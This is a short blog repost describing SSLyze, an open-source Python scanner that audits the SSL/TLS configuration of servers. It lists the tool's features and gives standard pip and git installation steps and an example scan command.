FAST FULL-FEATURED SSL SCANNER Posted on 10/02/2016, 13:06 By Johnny Cash SSLyze is a Python tool that can analyze the SSL configuration of a server by connecting to it. It is designed to be fast and comprehensive, and should help organizations and testers identify mis-configurations affecting their SSL servers. Key features Multi-processed and multi-threaded scanning: it’s very fast. Support for all SSL protocols, from SSL 2.0 to TLS 1.2. SSLyze can also be used as a library, in order to run scans and process the results directly from Python. Performance testing: session resumption and TLS tickets support. Security testing: weak cipher suites, insecure renegotiation, CRIME, Heartbleed and more. Server certificate validation and revocation checking through OCSP stapling. Support for StartTLS handshakes on SMTP, XMPP, LDAP, POP, IMAP, RDP, PostGres and FTP. Support for client certificates when scanning servers that perform mutual authentication. Installation SSLyze can be installed directly via pip: pip install sslyze or git clone https://github.com/nabla-c0d3/sslyze /opt/sslyze cd /opt/sslyze pip install -r requirements.txt --target ./lib Usage python sslyze_cli.py –regular www.yahoo.com:443 www.google.com Platforms SSLyze has been tested on the following platforms: Windows 7 (32 and 64 bits), Debian 7 (32 and 64 bits), OS X El Capitan. Sursa: http://securityblog.gr/3267/fast-full-featured-ssl-scanner/